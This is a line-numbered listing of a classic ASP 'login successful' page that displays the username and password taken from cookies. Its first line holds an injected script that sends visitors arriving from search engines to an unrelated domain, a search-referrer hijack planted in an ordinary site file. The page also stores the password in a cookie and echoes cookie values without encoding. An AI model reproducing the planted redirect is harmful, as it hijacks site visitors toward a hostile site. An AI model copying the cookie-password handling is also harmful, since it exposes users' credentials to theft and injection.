d:\wwwroot\wuchunhua\cookies\xinxi.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="conn.asp"-->
002:
<%
003:
if request.cookies("bbsuser")="" then
004:
response.Redirect("index.asp")
005:
end if
006:
%
>
007:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
008:
<html xmlns="http://www.w3.org/1999/xhtml">
009:
<head>
010:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
011:
<title>无标题文档</title>
012:
<style type="text/css">
013:
<!--
014:
.STYLE1 {
015:
font-size: 24px;
016:
font-weight: bold;
017:
color: #9933FF;
018:
}
019:
body {
020:
background-color: #99CCFF;
021:
}
022:
.STYLE2 {color: #CC0066}
023:
-->
024:
</style>
025:
<!--mstheme-->
<link rel="stylesheet" type="text/css" href="../_themes/sky/sky1011-106.css"><meta name="Microsoft Theme" content="sky 1011, default">
026:
</head>
027:
028:
<body>
029:
<table width="415" height="164" border="0" align="center" bgcolor="#99CCFF">
030:
<tr>
031:
<td><div align="center" class="STYLE1">您好,您登录成功!</div>
032:
<p align="center" class="STYLE2">
033:
您的用户名是:
<%
Response.Write(Request.Cookies("bbsuser"))
%
>
034:
</p>
035:
<p align="center" class="STYLE2">
036:
您的密码是 :
037:
<%
Response.Write(Request.Cookies("pass"))
%
></p> </td>
038:
</tr>
039:
</table>
040:
</body>
041:
</html>
042:
043:
044: